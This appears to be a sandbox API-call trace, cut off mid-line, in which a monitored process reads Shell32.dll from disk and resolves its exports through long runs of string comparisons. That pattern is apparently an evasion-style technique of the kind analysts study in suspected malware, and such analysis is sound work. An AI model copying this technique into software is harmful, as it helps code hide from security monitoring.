1 [0217.029] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0217.029] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0217.029] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0217.029] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0217.029] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0217.029] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0217.029] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0217.029] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0217.029] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0217.029] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0222.546] GetProcessHeap () returned 0x560000 [0222.546] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x417a040 | out: hHeap=0x560000) returned 1 [0222.556] GetProcessHeap () returned 0x560000 [0222.556] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x5792f0 [0222.557] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0222.557] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0222.557] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0222.557] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0222.557] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0222.558] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0222.558] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0222.558] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0222.558] GetProcessHeap () returned 0x560000 [0222.558] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1587258) returned 0x417f040 [0222.860] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0222.860] ReadFile (in: hFile=0x140, lpBuffer=0x417f040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x417f040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0230.922] CloseHandle (hObject=0x140) returned 1 [0230.922] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0230.923] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0230.923] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0230.923] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0230.923] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0230.923] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0230.923] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0230.923] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0230.923] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.923] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0230.923] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0230.923] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0230.924] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.924] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0230.924] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0230.924] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0230.924] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0230.924] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.924] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0230.924] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.924] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0230.924] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0230.924] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0230.924] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.924] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0230.924] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0230.924] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0230.924] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0230.924] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0230.924] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0230.924] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.924] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0230.924] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.924] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0230.925] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0230.925] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0230.925] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0230.925] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0230.925] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0230.925] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0230.925] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.925] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0230.926] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0230.926] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0230.926] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0230.926] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0230.927] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0230.928] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0230.929] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0230.930] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0230.931] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0230.931] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0230.931] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0230.931] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.931] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0230.931] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.932] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0230.932] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0230.932] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0230.932] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0230.932] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0230.932] lstrcmpA 